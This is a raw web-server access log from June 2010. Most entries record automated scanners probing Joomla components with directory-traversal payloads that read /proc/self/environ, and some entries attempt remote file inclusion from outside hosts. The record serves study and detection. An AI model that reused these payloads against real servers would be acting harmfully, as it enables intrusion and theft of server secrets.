91.203.68.45 - - [09/Jun/2010:23:24:56 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:24:56 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.55.65.134 - - [09/Jun/2010:23:25:42 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
87.253.162.10 - - [09/Jun/2010:23:25:43 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:25:43 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
74.55.65.134 - - [09/Jun/2010:23:25:43 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:25:43 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:25:51 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:25:51 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:25:51 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
83.170.108.207 - - [09/Jun/2010:23:25:55 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
74.55.65.134 - - [09/Jun/2010:23:25:57 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
91.203.68.45 - - [09/Jun/2010:23:25:58 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.55.65.134 - - [09/Jun/2010:23:26:01 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
91.203.68.45 - - [09/Jun/2010:23:26:01 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:26:02 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:26:02 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
173.201.187.126 - - [09/Jun/2010:23:26:04 -0500] "GET /logs/access_log.1274832000//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
173.201.187.126 - - [09/Jun/2010:23:26:04 -0500] "GET //index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.810"
173.201.187.126 - - [09/Jun/2010:23:26:04 -0500] "GET /logs//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:26:05 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:26:08 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:26:08 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:26:09 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:26:10 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
87.253.162.10 - - [09/Jun/2010:23:26:37 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
74.200.76.150 - - [09/Jun/2010:23:26:41 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
87.253.162.10 - - [09/Jun/2010:23:26:42 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
67.222.18.143 - - [09/Jun/2010:23:26:43 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
67.222.18.143 - - [09/Jun/2010:23:26:43 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
83.170.108.207 - - [09/Jun/2010:23:26:46 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
67.222.18.143 - - [09/Jun/2010:23:27:04 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
83.170.108.207 - - [09/Jun/2010:23:27:06 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
87.253.162.10 - - [09/Jun/2010:23:27:06 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:27:06 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
74.55.65.134 - - [09/Jun/2010:23:27:30 -0500] "GET /logs/access_log.1274313600//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
91.203.68.45 - - [09/Jun/2010:23:27:33 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
74.55.65.134 - - [09/Jun/2010:23:27:35 -0500] "GET /logs/access_log.1274313600//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
91.203.68.45 - - [09/Jun/2010:23:27:49 -0500] "GET /logs/access_log.1274313600//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:27:55 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:27:58 -0500] "GET /logs/access_log.1274313600//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
74.55.65.134 - - [09/Jun/2010:23:29:20 -0500] "GET /logs/access_log.1274832000//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:29:20 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:29:20 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:29:22 -0500] "GET /logs/access_log.1274832000//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:29:23 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:29:23 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
91.203.68.45 - - [09/Jun/2010:23:29:26 -0500] "GET /logs/access_log.1274832000//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
173.201.187.126 - - [09/Jun/2010:23:29:26 -0500] "GET /logs/access_log.1274572800//index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:29:26 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:29:26 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:29:28 -0500] "GET /logs/access_log.1274832000//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:29:28 -0500] "GET //index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:29:28 -0500] "GET /logs//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
74.55.65.134 - - [09/Jun/2010:23:29:31 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
74.55.65.134 - - [09/Jun/2010:23:29:36 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
91.203.68.45 - - [09/Jun/2010:23:29:45 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:29:52 -0500] "GET /logs/access_log.1274572800//index.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
94.23.11.205 - - [09/Jun/2010:23:30:38 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.11.205 - - [09/Jun/2010:23:30:38 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.11.205 - - [09/Jun/2010:23:30:48 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
94.23.11.205 - - [09/Jun/2010:23:30:54 -0500] "GET /logs/access_log.1274832000//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.11.205 - - [09/Jun/2010:23:30:54 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.11.205 - - [09/Jun/2010:23:30:54 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
118.129.166.213 - - [09/Jun/2010:23:31:55 -0500] "GET /logs/access_log.1212451200/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.79"
118.129.166.213 - - [09/Jun/2010:23:31:56 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.79"
174.89.32.123 - - [09/Jun/2010:23:31:56 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://en.wikipedia.org/wiki/Tattoo_flash""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
174.89.32.123 - - [09/Jun/2010:23:31:56 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
118.129.166.213 - - [09/Jun/2010:23:31:56 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.79"
174.89.32.123 - - [09/Jun/2010:23:32:02 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6.5; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
60.234.132.61 - - [09/Jun/2010:23:34:53 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.831"
87.253.162.10 - - [09/Jun/2010:23:39:13 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:39:13 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:39:13 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:39:13 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:39:16 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:39:16 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.805"
188.40.178.145 - - [09/Jun/2010:23:39:38 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.813"
188.40.178.145 - - [09/Jun/2010:23:39:39 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.813"
83.170.108.207 - - [09/Jun/2010:23:39:40 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
83.170.108.207 - - [09/Jun/2010:23:39:41 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.834"
83.170.108.207 - - [09/Jun/2010:23:39:41 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.834"
188.40.178.145 - - [09/Jun/2010:23:40:03 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.813"
188.40.178.145 - - [09/Jun/2010:23:40:05 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.813"
114.200.199.236 - - [09/Jun/2010:23:40:13 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
114.200.199.236 - - [09/Jun/2010:23:40:13 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.200.199.236 - - [09/Jun/2010:23:40:13 -0500] "GET /logs/access_log.1274572800%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.200.199.236 - - [09/Jun/2010:23:40:15 -0500] "GET /logs/access_log.1274572800%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 323 "-""Mozilla/5.0"
114.200.199.236 - - [09/Jun/2010:23:40:15 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
114.200.199.236 - - [09/Jun/2010:23:40:15 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.kangnung.org//zb//s1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.91.137.94 - - [09/Jun/2010:23:41:13 -0500] "GET /logs/scanhttp://lisa12.fileave.com/myid.jpg? HTTP/1.1" 404 327 "-""libwww-perl/5.813"
212.91.137.94 - - [09/Jun/2010:23:41:13 -0500] "GET /scanhttp://lisa12.fileave.com/myid.jpg? HTTP/1.1" 404 322 "-""libwww-perl/5.813"
188.40.178.145 - - [09/Jun/2010:23:41:52 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.813"
188.40.178.145 - - [09/Jun/2010:23:41:53 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.813"
83.170.108.207 - - [09/Jun/2010:23:41:57 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
83.170.108.207 - - [09/Jun/2010:23:41:58 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
81.93.240.122 - - [09/Jun/2010:23:42:03 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.122 - - [09/Jun/2010:23:42:04 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:42:06 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:42:07 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
188.40.178.145 - - [09/Jun/2010:23:42:07 -0500] "GET /logs/?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.813"
188.40.178.145 - - [09/Jun/2010:23:42:08 -0500] "GET /?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.813"
173.201.20.200 - - [09/Jun/2010:23:42:11 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.833"
87.253.162.10 - - [09/Jun/2010:23:42:11 -0500] "GET /logs/index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
173.201.20.200 - - [09/Jun/2010:23:42:11 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.833"
87.253.162.10 - - [09/Jun/2010:23:42:11 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
91.203.68.45 - - [09/Jun/2010:23:42:28 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:42:28 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
83.170.108.207 - - [09/Jun/2010:23:42:29 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
83.170.108.207 - - [09/Jun/2010:23:42:29 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
91.203.68.45 - - [09/Jun/2010:23:42:31 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:42:32 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
87.253.162.10 - - [09/Jun/2010:23:42:38 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:42:39 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:42:39 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:42:39 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
81.93.240.122 - - [09/Jun/2010:23:42:48 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
81.93.240.122 - - [09/Jun/2010:23:42:48 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
83.170.108.207 - - [09/Jun/2010:23:42:58 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
87.253.162.10 - - [09/Jun/2010:23:43:02 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:43:02 -0500] "GET /index.php?option=com_dwgraphs&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:43:26 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:43:27 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:43:30 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:43:30 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.13.96 - - [09/Jun/2010:23:43:39 -0500] "GET /logs/access_log.1233619200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.203.68.45 - - [09/Jun/2010:23:43:48 -0500] "GET /logs/access_log.1273363200/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:43:48 -0500] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.810"
91.203.68.45 - - [09/Jun/2010:23:43:52 -0500] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 8947 "-""libwww-perl/5.810"
87.253.162.10 - - [09/Jun/2010:23:44:04 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.162.10 - - [09/Jun/2010:23:44:04 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
83.170.108.207 - - [09/Jun/2010:23:44:17 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
74.200.76.150 - - [09/Jun/2010:23:44:25 -0500] "GET /logs/index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
74.200.76.150 - - [09/Jun/2010:23:44:25 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
74.200.76.150 - - [09/Jun/2010:23:44:37 -0500] "GET /index.php?option=com_abbrev&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
83.170.108.207 - - [09/Jun/2010:23:44:58 -0500] "GET /logs/access_log.1274572800/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.834"
